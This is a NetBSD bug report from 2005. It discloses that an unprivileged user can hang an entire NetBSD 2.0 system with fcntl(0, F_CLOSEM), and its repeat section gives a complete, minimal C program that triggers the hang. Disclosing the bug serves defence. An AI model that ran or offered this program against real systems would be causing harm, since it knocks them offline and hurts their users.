Subject: kern/28929: fcntl F_CLOSEM can hang entire system
To: None <kern-bug-people@netbsd.org, gnats-admin@netbsd.org,>
From: None <marcotte@panix.com>
List: netbsd-bugs
Date: 01/10/2005 16:09:01
>Number:         28929
>Category:       kern
>Synopsis:       fcntl F_CLOSEM can hang entire system
>Confidential:   yes
>Severity:       critical
>Priority:       high
>Responsible:    kern-bug-people
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Mon Jan 10 16:09:01 +0000 2005
>Originator:     Brian Marcotte
>Release:        NetBSD 2.0
>Organization:
	Panix
>Environment:
System: NetBSD panix5.panix.com 2.0 NetBSD 2.0 (PANIX-USER) #1: Fri Jan 7 20:17:17 EST 2005 root@trinity.nyc.access.net:/devel/netbsd/2.0/src/sys/arch/i386/compile/PANIX-USER i386
Architecture: i386
Machine: i386
>Description:
	An ordinary user can use fcntl(0,F_CLOSEM) and immediately hang
	the entire system.

	This, of course, is a local denial of service attack.
>How-To-Repeat:
	If you compile and run this program, the system immediately locks
	up. You do NOT need to be root.

	#include <fcntl.h>

	int
	main(void)
	{
		/* F_CLOSEM closes every descriptor >= the given fd (here 0). */
		fcntl(0, F_CLOSEM);
		return 0;
	}

>Fix:
	Don't know.